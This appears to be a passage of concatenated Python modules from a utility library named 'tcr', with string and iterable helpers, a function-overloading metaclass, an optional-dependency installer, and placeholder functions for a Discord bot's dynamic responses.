import re as regex

from .tcr_int import clamp


def commafy(text: str | int, splitter: str = ","):
	"""Commafy a number.

	Returns a string of that number split by commas if needed, or any character passed as splitter.
	"""
	if isinstance(text, int) and text < 0:
		return "-" + commafy(-text)
	text = str(text)
	temp = ""
	for i, letter in enumerate(text[::-1]):
		temp += letter
		if i % 3 == 2 and i != len(text) - 1:
			temp += splitter
	return temp[::-1]


def join_urlstr(*urlstrs: str) -> str:
	"""Join a sequence of urlstrs with '/'. Cleans up extra slashes."""
	s = [str(x).strip("/") for x in urlstrs]
	s = "/".join(s)
	return regex.sub(r"/+", "/", s)


class SlashableString(str):
	"""Represents a string that can be concatenated with another string along with a splitter by the use of the divide operator.

	Example:
	```py
	s = SlashableString("a")
	s1 = s / 'c'
	print(repr(s1)) # -> 'a/c'
	```
	Splitter can be changed with the `splitter` argument. (the splitter is '/' by default to be consistent with the division symbol)
	If strip argument is True, the string will be stripped of any leading or trailing splitters.
	If cleanup argument is True, the string will be cleaned up by replacing any double splitters with a single splitter (a.com//////b -> a.com/b).

	The floor division operator (`//`) is the same as the slash operator (`/`) except that it doesn't strip or cleanup the string afterwards, regardless of the settings.
	"""

	def __new__(cls, o: object, **_) -> "SlashableString":
		return super().__new__(cls, o)

	def __init__(self, o: object, *, splitter: str = "/", strip: bool = True, cleanup: bool = True) -> None:
		self.__splitter = str(splitter)
		self.__strip = strip
		self.__cleanup = cleanup

	def __truediv__(self, other: str) -> "SlashableString":
		s = f"{self}{self.__splitter}{other}"

		if self.__cleanup:
			while f"{self.__splitter}{self.__splitter}" in s:
				s = s.replace(f"{self.__splitter}{self.__splitter}", self.__splitter)

		if self.__strip:
			s = s.strip(self.__splitter)

		return SlashableString(s, splitter=self.__splitter, strip=self.__strip, cleanup=self.__cleanup)

	def __floordiv__(self, other: str) -> "SlashableString":
		return SlashableString(f"{self}{self.__splitter}{other}", splitter=self.__splitter, strip=self.__strip, cleanup=self.__cleanup)


def custom_zfill(value: int | str, fill_amount: int, fillchar: str = " ") -> str:
	"""
	Zfills the number to a certain length with a certain fill character.

	Supports negative numbers (- counts as a character when counting filling)

	Args:
	  value (int): value to zfill
	  fill_amount (int): how many chars in total must be in the zfilled string
	  fillchar (str): character to use for filling

	Returns:
	  str: zfilled string
	"""
	v = str(abs(value)) if not isinstance(value, str) else value
	while len(v) < (fill_amount - (0 if isinstance(value, str) else (1 if value < 0 else 0))):
		v = fillchar + v
	return v if isinstance(value, str) else ("-" + v if value < 0 else v)


def polaris_progressbar(
	current: int,
	total: int = 100,
	*,
	width: int = 30,
	chars: str = "▓░",
	pattern: str = "%(bar)s %(current)s/%(total)s %(percent)s%%",
	percent_decimal_places: int = 2,
	zfill_to_total_width: bool = True,
	zfill_with: str = " ",
) -> str:
	"""Generate a progress bar for use in a terminal."""
	total = round(total)

	if width < 0:
		width = 0

	progress = int(width * clamp(0, current, total) / total)
	bar = chars[0] * progress + " " * (width - progress)

	percent = f"{100 * current / total:.{percent_decimal_places}f}"

	return pattern % {
		"bar": bar,
		"current": current if not zfill_to_total_width else custom_zfill(current, len(str(total)), zfill_with),
		"total": total,
		"percent": percent if not zfill_to_total_width else custom_zfill(percent, len(f"{100:.{percent_decimal_places}f}"), zfill_with),
	}



# fmt: off
BACKSLASH  = '\\'
NEWLINE    = '\n'
CARR_RET   = '\r'
BACKSPACE  = '\b'
BACKTICK   = '`'
BACKTICKS  = 3*BACKTICK
APOSTROPHE = "'"
QUOTE      = '"'
FAKE_PIPE  = '¦'

# fmt: off
__all__ = [
  "BACKSLASH",
  "NEWLINE",
  "CARR_RET",
  "BACKSPACE",
  "BACKTICK", "BACKTICKS",
  "APOSTROPHE", "QUOTE",
  "FAKE_PIPE",
]



"""### This code was not written by me, however it's licensed with the MIT License which allows for free copy and sublicensing of the licensed material.

This code was written by [James Murphy](https://github.com/jamesmurphy-mc) from [MCoding](https://github.com/mCodingLLC/) ([YouTube](https://www.youtube.com/@mCoding))

[Original Source Code](https://github.com/mCodingLLC/VideosSampleCode/blob/master/videos/077_metaclasses_in_python/overloading.py)

Copy of the original license (applies only to this file):

```txt
MIT License

Copyright (c) 2022 MCODING, LLC

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
```

Small modifications were made to this code
"""

import inspect

from .tcr_error import NoMatchingOverloadError


def _type_hint_matches(obj, hint):
	# only works with concrete types, not things like Optional
	return hint is inspect.Parameter.empty or isinstance(obj, hint)


def _signature_matches(sig: inspect.Signature, bound_args: inspect.BoundArguments):
	# doesn't handle type hints on *args or **kwargs
	for name, arg in bound_args.arguments.items():
		param = sig.parameters[name]
		hint = param.annotation
		if not _type_hint_matches(arg, hint):
			return False
	return True


def overload(func):
	"""Decorator used to mark function as overload. Used in conjunction with tcr.OverloadMeta."""
	func.__overload__ = True
	return func


class OverloadList(list):
	pass


class _Overload:
	def __set_name__(self, owner, name):
		self.owner = owner
		self.name = name

	def __init__(self, overload_list):
		if not isinstance(overload_list, OverloadList):
			raise TypeError("must use OverloadList")
		if not overload_list:
			raise ValueError("empty overload list")
		self.overload_list = overload_list
		self.signatures = [inspect.signature(f) for f in overload_list]

	def __repr__(self):
		return f"{self.__class__.__qualname__}({self.overload_list!r})"

	def __get__(self, instance, _owner=None):
		if instance is None:
			return self
		# don't use owner == type(instance)
		# we want self.owner, which is the class from which get is being called
		return BoundOverloadDispatcher(instance, self.owner, self.name, self.overload_list, self.signatures)

	def extend(self, other):
		if not isinstance(other, _Overload):
			raise TypeError
		self.overload_list.extend(other.overload_list)
		self.signatures.extend(other.signatures)


class BoundOverloadDispatcher:
	def __init__(self, instance, owner_cls, name, overload_list, signatures):
		self.instance = instance
		self.owner_cls = owner_cls
		self.name = name
		self.overload_list = overload_list
		self.signatures = signatures

	def best_match(self, *args, **kwargs):
		for f, sig in zip(self.overload_list, self.signatures):  # noqa: B905
			try:
				bound_args = sig.bind(self.instance, *args, **kwargs)
			except TypeError:
				pass  # missing/extra/unexpected args or kwargs
			else:
				bound_args.apply_defaults()
				# just for demonstration, use the first one that matches
				if _signature_matches(sig, bound_args):
					return f

		raise NoMatchingOverloadError()

	def __call__(self, *args, **kwargs):
		try:
			f = self.best_match(*args, **kwargs)
		except NoMatchingOverloadError:
			pass
		else:
			return f(self.instance, *args, **kwargs)

		# no matching overload in owner class, check next in line
		super_instance = super(self.owner_cls, self.instance)
		super_call = getattr(super_instance, self.name, _MISSING)
		if super_call is not _MISSING:
			return super_call(*args, **kwargs)
		else:
			raise NoMatchingOverloadError()


_MISSING = object()


class OverloadDict(dict):
	def __setitem__(self, key, value):
		assert isinstance(key, str), "keys must be str"

		prior_val = self.get(key, _MISSING)
		overloaded = getattr(value, "__overload__", False)

		if prior_val is _MISSING:
			insert_val = OverloadList([value]) if overloaded else value
			super().__setitem__(key, insert_val)
		elif isinstance(prior_val, OverloadList):
			if not overloaded:
				raise ValueError(self._errmsg(key))
			prior_val.append(value)
		else:
			if overloaded:
				raise ValueError(self._errmsg(key))
			super().__setitem__(key, value)

	@staticmethod
	def _errmsg(key):
		return f"must mark all overloads with @overload: {key}"


class OverloadMeta(type):
	"""Overload Metaclass. Used in conjunction with @tcr.overload decorator.

	```py
	class A(metaclass=OverloadMeta):
	    @overload
	    def f(self, x: int):
	        print('A.f int overload', self, x)

	    @overload
	    def f(self, x: str):
	        print('A.f str overload', self, x)

	    @overload
	    def f(self, x, y):
	        print('A.f two arg overload', self, x, y)


	class B(A):
	    def normal_method(self):
	        print('B.f normal method')

	    @overload
	    def f(self, x, y, z):
	        print('B.f three arg overload', self, x, y, z)

	    # works with inheritance too!


	class C(B):
	    @overload
	    def f(self, x, y, z, t):
	        print('C.f four arg overload', self, x, y, z, t)
	"""

	@classmethod
	def __prepare__(mcls, name, bases):  # noqa: N804
		return OverloadDict()

	def __new__(mcls, name, bases, namespace, **kwargs):  # noqa: N804
		overload_namespace = {key: _Overload(val) if isinstance(val, OverloadList) else val for key, val in namespace.items()}
		return super().__new__(mcls, name, bases, overload_namespace, **kwargs)


class Overload(metaclass=OverloadMeta):
	"""Overload Class. Used in conjunction with @tcr.overload decorator.

	```py
	class A(Overload):
	    @overload
	    def f(self, x: int):
	        print('A.f int overload', self, x)

	    @overload
	    def f(self, x: str):
	        print('A.f str overload', self, x)

	    @overload
	    def f(self, x, y):
	        print('A.f two arg overload', self, x, y)


	class B(A):
	    def normal_method(self):
	        print('B.f normal method')

	    @overload
	    def f(self, x, y, z):
	        print('B.f three arg overload', self, x, y, z)

	    # works with inheritance too!


	class C(B):
	    @overload
	    def f(self, x, y, z, t):
	        print('C.f four arg overload', self, x, y, z, t)
	"""


__all__ = ["overload", "Overload", "OverloadMeta", "NoMatchingOverloadError"]



import re as regex
from collections.abc import Callable, Iterable, Iterator, MutableSequence
from random import shuffle
from typing import Any, Literal, TypeVar

from .tcr_compare import able
from .tcr_null import UniqueDefault as RaiseError
from .tcr_regex import RegexPreset

T = TypeVar("T")
Ts = TypeVar("Ts")


def batched(
	it: Iterable[T],
	n: int,
	*,
	back_to_front: bool = False,
) -> list[Iterable[T]]:
	"""### Poor man's `itertools.batched()` (on Py3.11).

	itertools.batched exists but I left it here because:
	- I still need to support py3.11
	- I don't think itertools.batched() has an option to easily back_to_front the results.

	Return a list of splits of the original `it` Iterable that was passed in, split every `n` items. Last group may be smaller than `n` items if the source was exhausted
	`back_to_front`: makes the items pile up in the back and now the first item is the one to have less than n items if there's not enough to pack it with. For example:
	- `batched("1234567890", n=3)                    ` returns `["123", "456", "789", "0"]`
	- `batched("1234567890", n=3, back_to_front=True)` returns `["1", "234", "567", "890"]`
	"""
	if back_to_front:
		return [x[::-1] for x in batched(it[::-1], n=n, back_to_front=False)[::-1]]
	return [it[i : i + n] for i in range(0, len(it), n)]


def cut_at(
	it: str | Iterable,
	n: int,
	end: str | Iterable = "...",
	*,
	filter_links: Literal[False] | str | Callable = False,
	shrink_links_visually_if_fits: bool = False,
) -> str:
	"""### Return a cut off part of the provided `it` iterable.

  with the `end` added at the end such that the return value is exactly `n` in length.\\
  Mainly strings but also supports other iterables\\
  Set `end` to `''`/`[]` to disable it.\\

  Use `filter_links` to shorten links to this string, only applicable if the iterable provided is a string and if the iterable exceeded `n`, else nothing will be affected
  - `$1` - Entire link
  - `$2` - http/https (will keep the 's' if present, that's its point)
  - `$3` - any `subdomains.` (if present), `.domains.` or `.tld`s
  - `$4` - `.domain` (second to last (possibly after . and) before the last .)
  - `$5` - `.tld` (in between the last . and / or end of match)
  - `$6` - part of the link after `/` (not including it, may be '')

  https://regex101.com/r/46LZtS/1

  `shrink_links_visually_if_fits` replaces links with their markdown counterparts where the visible text is http(s):/subdomain.domain.tld/ (no further part of the links is visible, but the entire link is contained)
  """
	if len(it) <= n:
		if shrink_links_visually_if_fits and len(a := regex.sub(RegexPreset.URL, r"[\2:/\3/](<\1>)", it)) <= n:  # :/ instead of :// because discord bruh
			return a
		return it
	if filter_links is not False and isinstance(it, str):
		if not isinstance(filter_links, str | Callable):
			msg = f"Set filter_links to a str of the replacement value for links or Callable, not {filter_links!r}"
			raise ValueError(msg)
		it = regex.sub(RegexPreset.URL, filter_links, it)
		if len(it) <= n:
			return it
	if n > len(end):
		return it[: (n - len(end))] + end
	if n > 0:
		return end[:n]
	return ""


def bogo_sort(arr: list[T]) -> list[T]:
	if 0 <= len(arr) <= 1:
		return arr
	while True:
		shuffle(arr)
		for i in range(len(arr) - 1):
			if arr[i] > arr[i + 1]:
				break
		else:
			return arr


def stalin_sort(arr: Iterable[T]) -> list[T]:
	if len(arr) <= 1:
		return arr

	sorted_arr = [arr[0]]

	for i in range(1, len(arr)):
		if arr[i] >= sorted_arr[-1]:
			sorted_arr.append(arr[i])

	return sorted_arr


def shuffled(arr: MutableSequence[T]) -> MutableSequence[T]:
	shuffle(arr)
	return arr


def limited_iterable(it: Iterable[T] | Iterator[T], limit: int) -> tuple[list[T], int]:
	"""## Return tuple[list, int] of (limited_iterable, overflow_from_limit).

	### This is different from it[:limit] because it works with iterators

	Examples:
	```py
	>>> limited_iterable([10, 20, 30], 10)
	([10, 20, 30], 0) # Nothing is cut off
	>>> limited_iterable([10, 20, 30], 3)
	([10, 20, 30], 0)
	>>> limited_iterable([10, 20, 30], 2)
	([10, 20], 1)
	>>> limited_iterable([10, 20, 30], 1)
	([10], 2)
	>>> limited_iterable([10, 20, 30], 0)
	([], 3)
	>>> limited_iterable([10, 20, 30], -1)
	([], 4) # Overflow counter counts the negative limit even though it makes no sense, for predictability reasons
	```
	---

	### When there's no len method on the passed in iterable (eg. generator) and the iterable takes longer than the limit the overflow returned is -1**

	```py
	>>> limited_iterable(range(10), 7)
	([0, 1, 2, 3, 4, 5, 6], 3) # range by itself has len support even though it's a generator due to comparing boundaries
	>>> limited_iterable(iter(range(10)), 7)
	([0, 1, 2, 3, 4, 5, 6], -1) # when wrapped into an iter() the length can't be determined within the limit
	>>> limited_iterable(iter(range(5)), 7)
	([0, 1, 2, 3, 4], 0) # 0 was returned even though it's a non-len object because the iterator was exhausted and the end of it being within limit could be determined.
	```
	"""
	if limit <= 0:
		return ([], len(it) - limit if able(len, it) else -1)
	list_ = []
	breaknext = False
	for i, item in enumerate(it):
		if breaknext:
			return breaknext
		list_.append(item)
		if i + 2 > limit:
			overflow = len(it) - limit if able(len, it) else -1
			breaknext = (list_, overflow)
	return list_, 0


def hasmanyattrs(obj, attr: str, *attrs: str) -> bool:
	attrs = (attr, *attrs)

	for attr in attrs:
		if not hasattr(obj, attr):
			return False

		obj = getattr(obj, attr)

	return True


def getmanyattrs(obj, attr: str, *attrs: str) -> Any:
	attrs = (attr, *attrs)

	for attr in attrs:
		obj = getattr(obj, attr)

	return obj


def getattr_queue(
	obj: object,
	/,
	*queue: str,
	return_as_str: bool = False,
	default: Any | RaiseError = RaiseError,
):
	"""## Try to access `obj`'s attrs in order.

	```py
	queue = ('__qualname__', '__name__')

	getattr(obj, '__qualname__') # return this if hasattr(obj, '__qualname__') else go to the next line
	getattr(obj, '__name__')     # return this if hasattr(obj, '__name__') else go to the next line
	if default is not RaiseError # RaiseError is the default value for default (if nothing is passed in)
	  return default
	raise KeyError("Unable to find any attrs from queue in obj.") # Nothing could be found, error raised.
	```

	In other words: try to get name #1, if not found, get name #2, if not found get #3, etc. etc. until the queue is exhausted.
	"""
	if not queue:
		raise ValueError("queue cannot be empty.")
	for name in queue:
		if hasmanyattrs(obj, *name.split(".")):
			if return_as_str:
				return name
			else:
				return getmanyattrs(obj, *name.split("."))
	if default is not RaiseError:
		return default
	raise KeyError("Unable to find any attrs from queue in obj.")


def Or(arg: T, *args: Ts, none: Any = None) -> T | Ts:
	"""### Returns the first element of the tuple (arg, *args) that does not equal the supplied (`none`) variable, by default None.

  This is different from or chaining because this does not check for truthy values but rather non-none values.\\
  Keep in mind, the passed in none may be unrelateed to built-in None however that is its default.
  """
	args = (arg, *args)

	for a in args:
		if a != none:
			return a

	return args[-1]


def slice_between(lst: Iterable, /, left=None, right=None, *, flip_on_left_right_mismatch: bool = True) -> Iterable:
	if lst:
		if left is None:
			left = lst[0]
		if right is None:
			right = lst[-1]
	else:
		raise KeyError(f"Unable to infer the list boundaries: the list is empty.")

	if left not in lst:
		raise KeyError(f"Left boundary {left!r} not found in the list.")
	if right not in lst:
		raise KeyError(f"Right boundary {right!r} not found in the list.")

	left_index = lst.index(left)
	right_index = lst.index(right)
	if left_index > right_index:
		if flip_on_left_right_mismatch:
			left_index, right_index = right_index, left_index
		else:
			raise ValueError("Left boundary cannot be to the right of the right boundary and flip_on_left_right_mismatch=False.")

	return lst[left_index : right_index + 1]



"""`other` submodule contains things that did not deserve their own files."""


def intbool(x: object, /):
	"""Return int(bool(x)). Kept for backwards-compatibility reasons. Idk why i even made this function but i'm too scared of something not working to remove it."""
	return int(bool(x))



import subprocess
import sys

from .tcr_console import console as c


class Dependency:
	import_name: str
	pip_name: str

	def __init__(self, *, import_as: str, pip_install_as: str = None) -> None:
		self.import_name = import_as
		self.pip_name = pip_install_as or import_as

	def install(self) -> bool:
		"""Returns bool if the installation succeeded or not."""
		try:
			subprocess.run([sys.executable, "-m", "pip", "install", self.pip_name], check=True)
		except subprocess.CalledProcessError:
			return False
		except Exception:
			return False
		else:
			return True


class DependencyEnsurer:
	deps: tuple[Dependency]
	auto_install: bool

	def __init__(self, *deps: Dependency, auto_install: bool = False) -> None:
		"""Allows libraries to have optional dependencies (I KNOW OF `lib[extra]` syntax..! - you should probably use that thing instead).

		Requires at least 1 dependency to work. (will do nothing if `deps=()`)

		auto_install: If true, will install any missing dependencies automatically, if False, a RuntimeError will be raised and a message will be displayed. Warning: This may heavily slow down the program and may crash if no internet connection is present to fetch the missing dependencies.
		"""
		self.deps = deps
		self.auto_install = auto_install

	def __call__(self, auto_install_override: bool | None = None) -> bool:
		"""Verify if this package's dependencies are installed."""

		auto_install = auto_install_override if auto_install_override is not None else self.auto_install

		missing_deps: list[Dependency] = []

		for dep in self.deps:
			try:
				__import__(dep.import_name)
			except ImportError:
				missing_deps.append(dep)

		def errored():
			c.error("The following dependencies are missing:")
			for dep in missing_deps:
				c.error(f"{dep.import_name!r} (pip install {dep.pip_name})")
			raise RuntimeError("Missing dependencies (see errors above for tips!!).")

		if missing_deps:
			if auto_install:
				for dep in missing_deps.copy():
					if not dep.install():
						errored()
					else:
						missing_deps.remove(dep)
			else:
				errored()



import re as _regex
from collections.abc import Iterable as _Iterable


def snake_to_camel(s: str, always_uppercase: _Iterable[str] = ("id",), unless_str_in_always_uppercase: bool = False) -> str:
	if unless_str_in_always_uppercase and s.lower() in always_uppercase:
		return s

	words = s.split("_")
	converted = words[0] + "".join(word.title() for word in words[1:])

	for word in always_uppercase:
		converted = converted.replace(word.title(), word.upper())

	return converted



from .. import util as __


@__.REQUIRE("__vars")
def var(_, name: str, value: str | None = None, *args, __vars: dict[str, str], **kwargs):
	"""### Simple, single-scope variables.

	Two modes:
	 - Set: `{var|key|value}`
	 - Get: `{var|key}` OR `{key}`

	You first have to set a value to something - if it doesn't exist `''` (an empty string) is returned.

	Example:
	```txt
	{var|var1|nya}{var1} {var|var1}
	```

	Result:
	```txt
	nya nya
	```
	"""
	if value is not None:
		__vars[name] = value
	else:
		return __vars.get(name, "")


@__.REQUIRE_POSITIONAL(2, None)
def test(_, left: str, right: str, iftrue: str = "true", iffalse: str = "false", **ctxs) -> str:
	"""### =IF() from excel. Returns the third parameter if the first two are equal otherwise the fourth.

	If less than 2 parameters are passed, the placeholder is left uneavaluated (stays as a string of '{test|arg1})

	Example:
	```txt
	{test| {username} | Colon | Your username is Colon! | Your username is not Colon!}
	```

	Result:
	```txt
	Your username is not Colon!
	(but if Colon ran this command, it would give the other response!)
	```
	"""
	if left == right:
		return iftrue
	else:
		return iffalse


def comment(*args, **ctxs) -> str:
	"""### Return empty string no matter the arguments/contexts.

	Example:
	```txt
	{#|this is a comment}This is te{#|another comment}xt
	```

	Result:
	```txt
	This is text
	```
	"""


__all__ = [x for x in globals() if not x.startswith("_")]



import functools
import math
import typing as t

if t.TYPE_CHECKING:
	import arc
import re as regex
from collections.abc import Callable
from enum import Enum, auto
from functools import wraps

import hikari

from ..src.tcr_compare import able
from ..src.tcr_console import console as c
from ..src.tcr_int import hex as tcrhex
from ..src.tcr_regex import RegexPreset
from ..src.tcr_run import run_sac
from .error import *


class _TT(Enum):
	TEXT = auto()
	PAREN_OPEN = auto()
	PAREN_CLOSE = auto()


class _Token:
	def __init__(self, type: _TT, value: str | None = None) -> None:
		self.type = type
		self.value = value

	def __repr__(self) -> str:
		return ("%s: %s" % (self.type.name, repr(self.value))) if self.value is not None else ("%s" % self.type.name)  # noqa: UP031


def _builder(x: str | bool) -> "_Token":
	if x is True:
		return _Token(_TT.PAREN_OPEN)
	elif x is False:
		return _Token(_TT.PAREN_CLOSE)
	elif isinstance(x, str):
		return _Token(_TT.TEXT, str(x))
	else:
		raise DynamicResponseSyntaxError(f"Unknown token type requested on build_placeholder_rich_return_value(): {x!r}")


def build_placeholder_rich_return_value(*args: str | bool) -> list[_Token]:
	"""Build a value returnable from a placeholder callable, which can be used to insert a placeholder instead of a string.

	This does not validate input.
	- str: TEXT token
	- True: PAREN_OPEN token
	- False: PAREN_CLOSE token
	"""
	return [_builder(x) for x in args]


def REQUIRE(*ctxs: str):
	"""Require at least 1 of the given contexts to be present, otherwise raise DynamicResponsePlaceholderMissingContextError."""

	def decorator(func):
		@wraps(func)
		async def wrapper(*args, **kwargs):
			for ctx in ctxs:
				if ctx in kwargs and kwargs[ctx] is not None:
					for ctx in ctxs:
						if ctx not in kwargs:
							kwargs[ctx] = None
					return await run_sac(func, *args, **kwargs)
			raise DynamicResponsePlaceholderMissingContextError(f"One of {ctxs!r} must be present")

		return wrapper

	return decorator


def REQUIRE_AUTHOR(func):
	@REQUIRE("event", "ctx")
	@wraps(func)
	async def wrapper(*args, event, ctx, **kwargs):
		return await run_sac(func, *args, author=(ctx.author if ctx else event.author), event=event, ctx=ctx, **kwargs)

	return wrapper


def SWITCH(switch_name: str, *, remove: bool = True):
	"""Append a bool context depending on whether or not the passed phrase is in args. Optionally remove it."""

	def decorator(func):
		@wraps(func)
		async def wrapper(*args, **kwargs):
			if switch_name in args:
				if remove:
					args = tuple(x for x in args if x != switch_name)
				kwargs[switch_name] = True
			else:
				kwargs[switch_name] = False
			return await run_sac(func, *args, **kwargs)

		return wrapper

	return decorator


def DEBUG_CATCH_ERRORS(func):
	@wraps(func)
	async def wrapper(*args, **kwargs):
		try:
			return await run_sac(func, *args, **kwargs)
		except Exception as e:
			print(e)
			input()
			raise

	return wrapper


def REQUIRE_POSITIONAL(required_positionals: int, default: str | None = None):
	def decorator(func):
		@wraps(func)
		async def wrapper(*args, **kwargs):
			if len(args) < (required_positionals + 1):
				return default if default is not None else rebuild_yourself(*args, **kwargs)
			return await run_sac(func, *args, **kwargs)

		return wrapper

	return decorator


def STRINGIFY(func: Callable):
	@wraps(func)
	async def wrapper(*args, **kwargs):
		return str(await run_sac(func, *args, **kwargs))

	return wrapper


def FLATTEN_IF_POSSIBLE(func: Callable):
	@wraps(func)
	async def wrapper(*args, **kwargs):
		return flatten_if_possible(await run_sac(func, *args, **kwargs))

	return wrapper


def REQUIRE_GUILD(default: Callable[..., str] | str = ""):
	def decorator(func):
		@REQUIRE("event", "ctx")
		@wraps(func)
		async def wrapper(*args, ctx, event, **kwargs):
			if ctx:
				guild = ctx.get_guild()
			elif hasattr(event, "get_guild"):
				guild = event.get_guild()
			else:
				guild = None

			if guild is None:
				return default(func, args, ctx=ctx, event=event, **kwargs) if callable(default) else default

			return await run_sac(func, *args, guild=guild, ctx=ctx, event=event, **kwargs)

		return wrapper

	return decorator


def REQUIRE_MEMBER_AUTHOR(default: Callable[..., str] | str = ""):
	def decorator(func):
		@REQUIRE_AUTHOR
		@REQUIRE_GUILD(default)
		@wraps(func)
		async def wrapper(*args, guild, author, **kwargs):
			return await run_sac(func, *args, member=guild.get_member(author), guild=guild, author=author, **kwargs)

		return wrapper

	return decorator


def rebuild_yourself(*args: str, __parens: tuple[str, str], __splitter: str, **_):
	"""# Rebuild Yourself (RYS).

	Return the placeholder as text, as if it wasnt evaluated at all.
	For example {dummy} -> returns the str '{dummy}'. Therefore it looks like the placeholder wasnt evaluated.

	This requires at least __parens and __splitter built-in contexts but can take entire **contexts and void others.

	This also supports argumented placeholders for example: {div|1|0} # Division by 0 is invalid so your implementation may be to return the str '{div|1|0}' - although that's not a very good example (it'd be better to return some numeric value for consistency) it's one that ilustrates the point.
	"""
	return f"{__parens[0]}{(__splitter.join(args))}{__parens[1]}"


def flatten_if_possible(n: float | int) -> float | int:
	if n.is_integer():
		return int(n)
	return n


def number(
	s: str,
	*,
	flatten_to_int_when_possible: bool = False,
	default: int | float = 0,
) -> float | int:
	if r := able(float, s):
		a = float(r.result)
		if flatten_to_int_when_possible:
			return flatten_if_possible(a)
		else:
			return a
	return default


def jsbool(b: bool) -> t.Literal["true", "false"]:
	return "true" if b else "false"



from collections.abc import Callable
from typing import Any


def insist(
	func: Callable[[], Any],
	validator: Callable[[Any], bool] = bool,
	func2: Callable[[], Any] | None = None,
):
	"""### Keep invoking `func` until `validator(func())` returns Truey result, return it.

	# Use `functools.partial` for this!!!

	```py
	from functools import partial
	number = int(insist(
	  partial(input, "Input a number: "),
	  partial(tcr.able, int)
	))
	```

	`func2` is invoked on 2nd and every later iteration, unless not provided, in that case `func` is invoked at all times.

	Keep in mind that insist won't convert the, str that was returned by `input()` in the above example, only verify its compliance with validator.
	"""
	result = func()
	if validator(result):
		return result
	while True:
		result = (func2 if func2 else func)()
		if not validator(result):
			continue

		return result



import importlib.util
import pathlib as p
from types import ModuleType


def load_package_dynamically(path: p.Path | str) -> ModuleType:
	"""Load a python package dynamically from disk. Warning: This executes the file contents as python code.

	It must be either a file with python code or a directory with an __init__.py file.

	This does not check for `.py` extension, if you load a user input `.txt` file, it'll get execed and it'd be your fault.
	"""
	pymodule_name = path.stem
	spec = importlib.util.spec_from_file_location(pymodule_name, str(path if path.is_file() else (path / "__init__.py")))
	pymodule = importlib.util.module_from_spec(spec)
	spec.loader.exec_module(pymodule)

	return pymodule



"""TODO: Make a markdown doc of all the placeholders sorted by sets like robotop dynamic response page."""

from functools import partial as __partial

from ..src.tcr_console import console as c
from ..src.tcr_dict import merge_dicts
from . import placeholders as __

# fmt: off

TEXT = {
  'comment': __.comment,
  '#':       __.comment,
  '//':      __.comment,
  'var':     __.var,
}
"""Ctrl+click whatever you're hovering on to see aliases for all the text placeholders"""

DISCORD = {
  # Author
  'username':      __.username,
  'user_name':     __.username,
  'user name':     __.username,
  'globalname':    __.globalname,
  'global_name':   __.globalname,
  'global name':   __.globalname,
  'nickname':      __.nickname,
  'nick_name':     __.nickname,
  'nick name':     __.nickname,
  'mention':       __.mention,
  '@':             __.mention,
  '@@':  __partial(__.mention, 'noping'),
  'discriminator': __.discriminator,
  'discrim':       __.discriminator,
  'tag':           __.tag,
  'id':            __.id,
  'bot':           __.bot,
  'isbot':         __.bot,
  'human':         __.human,
  'ishuman':       __.human,
  'roles':         __.roles,
  'avatar':        __.avatar,
  'color':         __.color,
  'rolecolor':     __.color,

  # Server
  'server':        __.server,

  # Misc
  'indms':         __.in_dms,
  'in_dms':        __.in_dms,
  'in dms':        __.in_dms,
}
"""Ctrl+click whatever you're hovering on to see aliases for all the discord placeholders."""

DISCORD_TROUBLEMAKERS = {
  'attach':     __.attach,
  'attachment': __.attach, # May cause a BadRequestError when a technically valid link is supplied but one that doesn't point to any valid file to attach.
}

ALL_DISCORD = {**DISCORD, **DISCORD_TROUBLEMAKERS}

UNSAFE_MATH = {
  'add':         __.add,
  'subtract':    __.subtract,
  'sub':         __.subtract,
  'multiply':    __.multiply,
  'mul':         __.multiply,
  'divide':      __.divide,
  'div':         __.divide,
  'floordivide': __.floordivide,
  'fdiv':        __.floordivide,
  'floordiv':    __.floordivide,
  'power':       __.power,
  'pow':         __.power,
  'modulo':      __.modulo,
  'mod':         __.modulo,
}
"""WARNING: Unsafe math operations are those which may stall the main python thread forever if certain arguments are supplied.

I tried searching far and wide for a time-based termination solution but i couldn't find any that worked or worked not only on unix.

Ctrl+click whatever you're hovering on to see aliases for all the unsafe math placeholders.
"""

SAFE_MATH = {
  'round':   __.round_,
  'floor':   __.floor,
  'ceil':    __.ceil,
  'ceiling': __.ceil,
}
"""Read unsafe math operations doc string to find out what are safe ones.

Ctrl+click whatever you're hovering on to see aliases for all the safe math placeholders.
"""

# fmt: on

SAFE_AND_UNSAFE_MATH = {**UNSAFE_MATH, **SAFE_MATH}
"""WARNING: This contains both UNSAFE and safe sides of the math module. To see more see .UNSAFE_MATH docstring.

Ctrl+click whatever you're hovering on to see aliases for all the math placeholders.
"""

ALL = merge_dicts(
	*[y for x, y in vars().items() if x.upper() == x and x.lower() != x],
	# {x: y for x, y in vars(__).items() if not x.startswith('_') and not x.startswith('p_')},
)
ALL_NON_DISCORD = {x: y for x, y in ALL.items() if x not in ALL_DISCORD}
ALL_NON_UNSAFEMATH = {x: y for x, y in ALL.items() if x not in UNSAFE_MATH}
ALL_NON_UNSAFEMATH_NON_DISCORD = {x: y for x, y in ALL.items() if x not in UNSAFE_MATH and x not in ALL_DISCORD}



from functools import wraps

from .tcr_error import error


def apostrophe_s(word: str):
	"""### Adds 's to a word unless it ends with s, then it adds only the apostrphe '.

	```py
	>>> apostrophe_s('Mark')
	"Mark's"
	>>> apostrophe_s('James')
	"James'"
	"""
	if word.endswith("s"):
		return word + "'"
	return word + "'s"


def plural_s(n: int, *, s: str = "s"):
	"""Return `'s'` if `n != 1` else `''`."""
	return s if n != 1 else ""


def _caps_deco(func):
	@wraps(func)
	def wrapper(word: str, *args, **kwargs):
		result = func(word, *args, **kwargs)
		if word.isupper():
			return result.upper()
